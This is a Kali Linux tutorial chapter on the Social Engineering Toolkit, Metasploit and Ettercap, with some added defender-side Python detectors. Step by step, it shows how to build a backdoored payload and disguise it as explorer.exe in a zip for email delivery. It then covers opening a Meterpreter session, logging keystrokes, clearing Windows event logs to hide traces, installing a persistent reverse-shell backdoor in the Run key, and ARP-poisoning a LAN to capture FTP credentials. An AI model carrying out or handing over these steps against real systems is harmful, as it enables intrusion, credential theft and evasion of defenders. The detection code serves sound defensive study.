Kali Linux: Using the Social Engineering Toolkit (SET)


The Social Engineering Toolkit (SET) is an open-source, Python-driven social engineering penetration testing tool. Designed by David Kennedy, it has become a standard tool for social engineering assessments in industry. SET exploits people's curiosity, trust, greed and simple mistakes: it targets the human element rather than a software flaw. SET can be used to deliver a payload to the target system, collect data from the target system, create a persistent backdoor, carry out a man-in-the-middle attack, and so on. This section describes how to use the Social Engineering Toolkit.

7.3.1 Starting the Social Engineering Toolkit

Before using the Social Engineering Toolkit you need to start it. The steps are as follows.

(1) Start SET. Execute the following command at the terminal:

root@kali:~# setoolkit

Alternatively, on the desktop, select Applications | Kali Linux | Exploitation Tools | Social Engineering Toolkit | setoolkit; this opens a terminal and runs the setoolkit command automatically.

After executing the above command, the following information will be output:

[-] New set_config.py file generated on: 2014-05-06 18:05:41.766123
[-] Verifying configuration update...
[*] Update verified, config timestamp is: 2014-05-06 18:05:41.766123
[*] SET is using the new config, no need to restart

Copyright, The Social-Engineer Toolkit (SET) by TrustedSec, LLC
All rights reserved.

Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:

  * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
  * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
  * Neither the name of Social-Engineer Toolkit nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.

THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

The above licensing was taken from the BSD licensing and is applied to Social-Engineer Toolkit as well.

Note that the Social-Engineer Toolkit is provided as is, and is a royalty free open-source application.

Feel free to modify, use, change, market, do whatever you want with it as long as you give the appropriate credit where credit is due (which means giving the authors the credit they deserve for writing it).

Also note that by using this software, if you ever see the creator of SET in a bar, you should give him a hug and buy him a beer. Hug must last at least 5 seconds. Author holds the right to refuse the hug or the beer.

The Social-Engineer Toolkit is designed purely for good and not evil. If you are planning on using this tool for malicious purposes that are not authorized by the company you are performing assessments for, you are violating the terms of service and license of this toolset. By hitting yes (only one time), you agree to the terms of service and that you will only use this tool for lawful purposes only.

Agree to the terms of service [y/n]:

The output describes SET in detail. It is displayed only the first time the tool is run, and you must accept the terms of service before you can do anything else. Enter y and the information shown below is displayed:

The above shows the creator, version, code name and menu of the Social Engineering Toolkit. Choose the number that matches what you want to do.

(2) Choose Social-Engineering Attacks, which is number 1 in the menu. After entering 1 at the set> prompt, the following information is displayed:

set> 1

    Welcome to the Social-Engineer Toolkit (SET).
    The one stop shop for all of your SE needs.

   Join us on irc.freenode.net in channel #setoolkit

 The Social-Engineer Toolkit is a product of TrustedSec.

           Visit: https://www.trustedsec.com

Select from the menu:

   1) Spear-Phishing Attack Vectors
   2) Website Attack Vectors
   3) Infectious Media Generator
   4) Create a Payload and Listener
   5) Mass Mailer Attack
   6) Arduino-Based Attack Vector
   7) SMS Spoofing Attack Vector
   8) Wireless Access Point Attack Vector
   9) QRCode Generator Attack Vector
  10) Powershell Attack Vectors
  11) Third Party Modules

  99) Return back to the main menu.

set>

The menu above lists the available social engineering attack vectors; choose the type of attack to carry out.

(3) Choose Create a Payload and Listener by entering 4. The output is as follows:

The output lists all the payloads that can be generated; choose the one appropriate to your target system.

(4) The target system in this example is 32-bit Windows XP, so select number 2 here. The output is as follows:

set:payloads> 2

Select one of the below, 'backdoored executable' is typically the best. However,
most still get picked up by AV. You may need to do additional packing/crypting
in order to get around basic AV detection.

  1) shikata_ga_nai
  2) No Encoding
  3) Multi-Encoder
  4) Backdoored Executable

The output lists the encoding options for the payload, which the tool offers for getting past basic antivirus detection.

(5) Select the fourth option, Backdoored Executable, by entering 4. The output is as follows:

The output shows SET binding the specified IP address and port and starting a handler. The IP address has to be given explicitly because a host may have several NICs, while the port number is fixed. Once the listener is running, the attacking host waits for the compromised system to connect and services those connections.

7.3.2 Delivering the payload to the target system

The payload is the code the user wants the target system to execute after a successful exploitation. In the Metasploit framework the payload can be freely selected, delivered and planted. For example, a reverse shell payload makes the target host open a network connection back to the attacking host and provides a command-line shell over it, while a bind shell payload attaches a command-line shell to a listening port on the target system so that the attacker can connect to that port for shell access. A payload can also be as simple as executing a few commands on the target system, such as adding a user account. The steps for delivering the payload to the target system are as follows.

(1) SET is installed by default under /usr/share/set, and this directory contains an executable named payload.exe. To avoid being noticed by the user of the target host during the penetration test, it is recommended to rename the file before sending it. It can be delivered in many ways, for example by mail or on a USB stick. First switch to /usr/share/set and list the files in that directory. The execution commands are as follows:

The listing shows a file named payload.exe. Rename it to explorer.exe before sending it on.

(2) Rename payload.exe. The execution commands are as follows:

The listing now shows only one file, named explorer.exe.

(3) Deliver the file. If you send it by mail you need to compress it first, because mail does not allow EXE attachments. Compress it with the zip command as follows:

root@kali:/usr/share/set# zip healthfiles explorer.exe
  adding: explorer.exe (deflated 88%)

The output shows that explorer.exe was compressed successfully, so it can now be sent as a mail attachment. When the recipient on the target system opens the file, a session is established with the attacker's handler, as shown below:

msf exploit(handler) >
[*] Sending stage (769024 bytes) to 192.168.41.146
[*] Meterpreter session 1 opened (192.168.41.234:443 -> 192.168.41.146:2126) at 2014-05-06 19:25:43 +0800

The output above shows that the target system has established a session with the attacker, who can now act on the target system.

7.3.3 Collecting data from the target system

The previous section delivered the payload to the target system and established a session. Once a session is up, the attacker can collect data from the target system; the more information is gathered, the more it can support further penetration. The steps for collecting data from the target system are as follows.

(1) Interact with the Meterpreter session. The execution commands are as follows:

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

(2) Start the keystroke logger. The execution commands are as follows:

meterpreter > keyscan_start
Starting the keystroke sniffer...

(3) Dump the keystrokes captured on the target system. The execution commands are as follows:

meterpreter > keyscan_dump
Dumping captured keystrokes...
<Return> <Return> <Return> <N1> <Return> 2 <Return> 34

The output shows that the user of the target system pressed Return several times and entered the numbers 1, 2 and 34.

7.3.4 Clearing traces

Any action an attacker performs on the target system may be written to its log files. To avoid being discovered by the target system, clearing traces is an important task, because discovery causes a lot of trouble. Metasploit provides an easy way to clear these traces, described below. The steps for clearing traces with Metasploit are as follows.

(1) Interact with the Meterpreter session. The execution commands are as follows:

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

(2) Metasploit's IRB shell can be used to clear the trail. The execution commands are as follows:

meterpreter > irb
[*] Starting IRB shell
[*] The 'client' variable holds the meterpreter client

>>

The >> prompt in the output shows that the IRB shell started successfully.

(3) Select the log you want to delete. The common log names are as follows:

    • log = client.sys.eventlog.open('system')
    • log = client.sys.eventlog.open('security')
    • log = client.sys.eventlog.open('application')
    • log = client.sys.eventlog.open('directory service')
    • log = client.sys.eventlog.open('dns server')
    • log = client.sys.eventlog.open('file replication service')

All logs are cleared here. The execution commands are as follows:

>> log = client.sys.eventlog.open('system')
>> log = client.sys.eventlog.open('security')
>> log = client.sys.eventlog.open('application')
>> log = client.sys.eventlog.open('directory service')
>> log = client.sys.eventlog.open('dns server')
>> log = client.sys.eventlog.open('file replication service')

After executing the above commands, the log to be purged is specified. Next, execute log.clear to clear the log file. The execution commands are as follows:

>> log.clear

After executing the above command, the selected log is cleared and the user's trail is hidden.
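An added defender-side example, not part of the original tutorial: clearing a log leaves its own trace, because Windows records the clear as the first event of the emptied log (ID 517 on Windows XP/2003 and 1102 on later versions for the Security log, 104 for the System log), and copies that were already forwarded to a central collector are untouched. The Python below checks exported records for those markers and recovers the removed entries from the collector's copy; all records are constructed.

```python
"""Spot a cleared Windows event log and recover what was removed.

Added example, not part of the original tutorial; all records are constructed.
"""
from typing import NamedTuple

# Event IDs Windows itself writes when a log is cleared. The record survives
# the clear because it is written into the freshly emptied log.
CLEAR_EVENTS = {
    ("Security", 517): "Security log cleared (Windows XP / Server 2003)",
    ("Security", 1102): "Security log cleared (Vista and later)",
    ("System", 104): "System log cleared (Vista and later)",
}


class Event(NamedTuple):
    record: int      # sequential record number inside one log
    log: str
    event_id: int
    time: str
    user: str


# Constructed: records a central collector received from the XP host during
# the day (528 = successful logon, 592 = new process, in XP numbering).
COLLECTOR = [
    Event(5001, "Security", 528, "2014-05-07 09:12:03", "test"),
    Event(5002, "Security", 592, "2014-05-07 16:20:11", "test"),
    Event(5003, "Security", 528, "2014-05-07 16:25:47", "test"),
    Event(5004, "Security", 592, "2014-05-07 16:25:48", "test"),
]
# Constructed: the host's own Security log, read after the log.clear step.
LOCAL = [
    Event(5005, "Security", 517, "2014-05-07 16:31:09", "test"),
]


def find_clear_events(events):
    """Return (event, description) for every log-cleared marker."""
    return [(e, CLEAR_EVENTS[(e.log, e.event_id)])
            for e in events if (e.log, e.event_id) in CLEAR_EVENTS]


def freshly_cleared_logs(events):
    """Logs whose earliest surviving record is the clear marker itself,
    i.e. no history at all remains before it."""
    first = {}
    for e in sorted(events, key=lambda ev: ev.record):
        first.setdefault(e.log, e)
    return sorted(log for log, e in first.items()
                  if (log, e.event_id) in CLEAR_EVENTS)


def removed_records(collector, local):
    """Records the collector holds that no longer exist on the host."""
    still_present = set(local)
    return [e for e in collector if e not in still_present]


if __name__ == "__main__":
    for e, why in find_clear_events(LOCAL):
        print(f"{e.time} {e.log}: {why} (by {e.user})")
    print("freshly cleared:", freshly_cleared_logs(LOCAL))
    for e in removed_records(COLLECTOR, LOCAL):
        print(f"removed from host: {e.log} #{e.record} id={e.event_id} {e.time}")
```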

7.3.5 Creating a persistent backdoor

Once access to the target system has been obtained, you need a way to get back to the target host without having to compromise it again. If the target user breaks the connection, for example by restarting the computer, a backdoor lets the connection to the target system be re-established automatically, so an interrupted connection does not stop the work. The steps for creating a persistent backdoor are as follows.

(1) Interact with the Meterpreter session. The execution commands are as follows:

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter >

(2) Before creating the backdoor, view the help of the persistence script. The execution commands are as follows:

The output shows the options of the persistence script; use them to configure the backdoor.

(3) Create the persistent backdoor. The execution commands are as follows:

meterpreter > run persistence -U -A -i 10 -8090 -r 192.168.41.234
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/aa-886okjm26fsw_20140507.2857/aa-886okjm26fsw_20140507.2857.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.41.234 LPORT=4444
[*] Persistent agent script is 148405 bytes long
[+] Persistent Script written to C:\DOCUME~1\test\LOCALS~1\Temp\izxbdjvcpnd.vbs
[*] Starting connection handler at port 4444 for windows/meterpreter/reverse_tcp
[+] Multi/Handler started!
[*] Executing script C:\DOCUME~1\test\LOCALS~1\Temp\izxbdjvcpnd.vbs
[+] Agent executed with PID 1612
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\merugsie
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\merugsie

The output shows the backdoor being created: a persistent script is written to the target system at C:\DOCUME~1\test\LOCALS~1\Temp\izxbdjvcpnd.vbs and registered under the Run key so that it starts automatically. The script runs on the target host and a second Meterpreter session is opened, as shown below:

meterpreter >
[*] Meterpreter session 2 opened (192.168.41.234:443 -> 192.168.41.146:1032) at 2014-05-07 16:25:47 +0800

The output above shows that the persistent backdoor was created successfully.
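Added example, not from the original tutorial: the footprint the persistence script leaves on the target (a randomly named value under HKCU\...\Run pointing at a randomly named .vbs in the user's temp folder) is what a defender looks for. The Python below scans a set of Run values for autoruns that launch a script file from a user-writable folder; apart from the first entry, which copies the value name and path from the output above, the Run values are constructed.

```python
"""Flag Run-key autoruns that look like the dropped persistence agent.

Added example, not part of the original tutorial. Apart from the first
entry, which copies the name and path from the output above, the Run
values below are constructed.
"""
import re
from pathlib import PureWindowsPath

SCRIPT_EXTS = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".hta", ".ps1"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe"}
# Folders an ordinary user can write to; a dropped agent lives here, while
# legitimate autoruns normally sit under Program Files or Windows.
USER_WRITABLE = ("\\temp\\", "\\locals~1\\", "\\appdata\\",
                 "\\application data\\", "\\users\\public\\")

RUN_VALUES = {
    "merugsie": r"C:\DOCUME~1\test\LOCALS~1\Temp\izxbdjvcpnd.vbs",
    "ctfmon.exe": r"C:\WINDOWS\system32\ctfmon.exe",
    "Backup": r'wscript.exe "C:\Program Files\Backup\nightly.vbs"',
    "Updater": r'cscript.exe //B "C:\Documents and Settings\test\Application Data\upd.js"',
}

_TOKEN = re.compile(r'"([^"]+)"|(\S+)')


def tokens(command):
    """Split a Run value into its quoted or bare tokens."""
    return [quoted or bare for quoted, bare in _TOKEN.findall(command)]


def suspicious_autorun(command):
    """Reasons an autorun looks like a dropped agent (empty list if none)."""
    parts = tokens(command)
    if not parts:
        return []
    launcher = PureWindowsPath(parts[0]).name.lower()
    # The script is either the value itself or the last argument of a host.
    script = PureWindowsPath(parts[-1] if launcher in SCRIPT_HOSTS else parts[0])
    reasons = []
    if script.suffix.lower() in SCRIPT_EXTS:
        reasons.append(f"launches a script file ({script.name})")
    if any(marker in str(script).lower() for marker in USER_WRITABLE):
        reasons.append("runs from a user-writable temp/profile folder")
    return reasons


def scan(run_values):
    """Map each suspicious value name to the reasons it was flagged."""
    hits = {}
    for name, command in run_values.items():
        reasons = suspicious_autorun(command)
        if reasons:
            hits[name] = reasons
    return hits


if __name__ == "__main__":
    for name, reasons in scan(RUN_VALUES).items():
        print(f"{name}: {'; '.join(reasons)}")
```

An entry that triggers both reasons, like merugsie here, matches the pattern of the persistence script exactly; a single reason (a script under Program Files) is worth a look but often legitimate.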

7.3.6 Man-in-the-middle attack (MITM)

A man-in-the-middle (MITM) attack is an indirect intrusion. A computer controlled by the intruder is placed, logically, between two communicating computers on the network; that computer is the "middleman". The following describes the use of the Ettercap tool for a man-in-the-middle attack.

1. The weakness exploited

A man-in-the-middle attack reaches the target host through various technical means. Since the host is attacked while it is transmitting data, there is a weakness in that process; it is analysed next.

When hosts communicate, data is encapsulated into packets that are forwarded to the destination host. A forwarded packet carries the source and destination IP addresses and the MAC addresses. When a host cannot find the destination host's address in its own ARP cache, it sends an ARP broadcast, and at that moment another host can impersonate the destination.

2. How ARP spoofing works

For a man-in-the-middle attack an attacker usually considers ARP spoofing or DNS spoofing. ARP spoofing is the common case, and its principle is described here.

In general ARP spoofing does not stop the network from working; instead it impersonates the gateway or another host so that traffic for that gateway or host is forwarded through the attacking host. Because the traffic passes through it, the attacking host can control and inspect it and obtain confidential information. The ARP spoofing process is shown in Figure 7.2.

As Figure 7.2 shows, when host A wants to communicate with host B and does not find host B's MAC address in its ARP cache, it sends an ARP broadcast that every computer on the LAN receives. Host C then answers host A, claiming to be host B with MAC address xx-xx-xx-xx-xx-xx, and host A updates its cache with that address. From then on, data that host A sends to host B is delivered to the attacking host (host C), which forwards it on to host B.

Figure 7.2 ARP Spoofing host

3. The man-in-the-middle attack

A man-in-the-middle attack has two stages: first a computer is attacked by some means, then the host is deceived. The two stages are shown in Figures 7.3 and 7.4.

First stage:

Figure 7.3 ARP Injection attack

In this stage host B uses an ARP injection attack to carry out ARP spoofing, and through it takes control of the traffic and confidential information of host A and other hosts.

Second stage:

After the first stage succeeds, host B can act as the middleman on this network, forwarding or viewing the data flow between host A and other hosts, as shown in Figure 7.4.

Figure 7.4 Man-in-the-middle attack mechanism

(1) On this LAN, when host A sends a request to host C, the data actually goes to host B.

(2) Host B forwards the data stream from host A on to host C.

(3) Host C receives the data as if it had come directly from host A, so it answers host A's request; the reply is likewise forwarded to host A by host B.

(4) When host A receives the reply it logs in to host C, and host A's login user name and password are seen by host B.
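As an added example that is not part of the original tutorial, the following Python monitor takes the principle of Figure 7.2 and the four-step exchange above from the defender's side: it learns IP-to-MAC bindings from ARP traffic and raises the alerts a tool such as arpwatch would, namely an unsolicited reply, a binding that changes, and one MAC answering for several addresses. The gateway address and all MAC addresses are constructed; 192.168.41.151 is the target used later on this page.

```python
"""Detect the ARP cache rewrite of Figure 7.2 from observed ARP traffic.

Added example, not part of the original tutorial. The gateway address and
all MAC addresses are constructed; the target address is the one used on
this page.
"""
from collections import defaultdict

GATEWAY = "192.168.41.1"
TARGET = "192.168.41.151"
GATEWAY_MAC = "00:50:56:01:02:03"
ATTACKER_MAC = "00:0c:29:aa:bb:cc"


class ArpMonitor:
    """Learns IP-to-MAC bindings from ARP traffic and reports anomalies,
    in the manner of arpwatch."""

    def __init__(self):
        self.bindings = {}                  # ip -> mac currently believed
        self.ips_by_mac = defaultdict(set)  # mac -> every ip it answered for
        self.pending = set()                # ips asked for by a request
        self.alerts = []

    def request(self, asked_ip):
        """A 'who-has asked_ip' broadcast was seen (host A in Figure 7.2)."""
        self.pending.add(asked_ip)

    def reply(self, ip, mac):
        """An 'ip is-at mac' reply was seen; returns the alerts it raised."""
        mac = mac.lower()
        raised = []
        # A reply nobody asked for is how a poisoner pushes its binding.
        if ip not in self.pending:
            raised.append(f"unsolicited reply: {ip} is-at {mac}")
        self.pending.discard(ip)
        known = self.bindings.get(ip)
        if known is not None and known != mac:
            raised.append(f"binding changed: {ip} was {known}, now {mac}")
        self.bindings[ip] = mac
        # Impersonating the gateway towards the target and the target
        # towards the gateway leaves one MAC answering for both addresses.
        self.ips_by_mac[mac].add(ip)
        if len(self.ips_by_mac[mac]) > 1:
            raised.append(f"{mac} answers for several addresses: "
                          + ", ".join(sorted(self.ips_by_mac[mac])))
        self.alerts.extend(raised)
        return raised


def replay_constructed_capture():
    """Feed a constructed sequence: one normal exchange, then poisoning."""
    mon = ArpMonitor()
    mon.request(GATEWAY)              # target asks who has the gateway
    mon.reply(GATEWAY, GATEWAY_MAC)   # gateway answers, binding learned
    mon.reply(GATEWAY, ATTACKER_MAC)  # attacker answers for the gateway
    mon.reply(TARGET, ATTACKER_MAC)   # ... and for the target as well
    return mon


if __name__ == "__main__":
    for alert in replay_constructed_capture().alerts:
        print("ALERT:", alert)
```

Static ARP entries for the gateway on important hosts, or dynamic ARP inspection on the switch, stop the rewrite that this monitor only reports.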

The steps for carrying out the man-in-the-middle attack with the Ettercap tool are as follows.

(1) Start the Ettercap tool. The execution commands are as follows:

root@kali:~# ettercap -G

After executing the above command, the interface shown in Figure 7.5 is displayed.

Figure 7.5 Ettercap Start-up interface

(2) This is the initial interface of the Ettercap tool. The next step is to achieve the man-in-the-middle attack by capturing packets. In the menu bar, select Sniff | Unified sniffing, or press Shift+U; the interface shown in Figure 7.6 is displayed.

Figure 7.6 Start sniffing

(3) After clicking Unified sniffing, the interface shown in Figure 7.7 is displayed.

Figure 7.7 Selecting an interface

(4) Select the network interface here. Select eth0 and click the OK button; the interface shown in Figure 7.8 is displayed.

Figure 7.8 Interface started

(5) Once the interface is started, you can scan for all hosts. In the menu bar, select Hosts | Scan for hosts, or press Ctrl+S, as shown in Figure 7.9.

Figure 7.9 Starting the scan host

(6) After clicking Scan for hosts, the interface shown in Figure 7.10 is displayed.

Figure 7.10 scanning the host interface

(7) The output in this interface shows that five hosts were found in total. To view the hosts that were found, select Hosts | Hosts list in the menu bar, or press H, as shown in Figure 7.11.

Figure 7.11 Opening the host list

(8) After clicking Hosts list, the interface shown in Figure 7.12 is displayed.

Figure 7.12 all the hosts scanned

(9) The interface shows the IP address and MAC address of the five hosts found. Select one of them as the target system: select the 192.168.41.151 host here and click the Add to Target 1 button. After adding the target, start capturing packets by selecting Start | Start sniffing in the menu bar, or by pressing Ctrl+W, as shown in Figure 7.13.

Figure 7.13 Starting the scan

(10) Once sniffing has started, the important information of the target system is obtained by means of an ARP injection attack. To start the ARP injection attack, select Mitm | ARP poisoning... in the menu bar, as shown in Figure 7.14.

Figure 7.14 ARP injection attack diagram

(11) After clicking ARP poisoning, the interface shown in Figure 7.15 is displayed. Select the attack options in this interface; select Sniff remote connections here. Then click the OK button, and the interface shown in Figure 7.16 is displayed.

Figure 7.15 Attack options

Figure 7.16 Attack interface

(12) From this point on, when a user logs in to the 192.168.41.151 host, the user's sensitive information is passed to the attacker. The sensitive information captured in this example is shown in Figure 7.17.

Figure 7.17 captured sensitive information

(13) This interface shows that a user logged in to the FTP server on the 192.168.41.151 host with the user name anonymous and the password 123456. FTP sends the user name and password in cleartext, which is why they appear in the capture. To stop sniffing after obtaining this information, click Start | Stop sniffing in the menu bar, as shown in Figure 7.18.

Figure 7.18 Stop sniffing

(14) After stopping sniffing, you also need to stop the man-in-the-middle attack. In the menu bar, click Mitm | Stop mitm attack(s); the interface shown in Figure 7.19 is displayed.

Figure 7.19 Stop the man-in-the-middle attack

(15) Click the OK button in this interface to complete the man-in-the-middle attack.

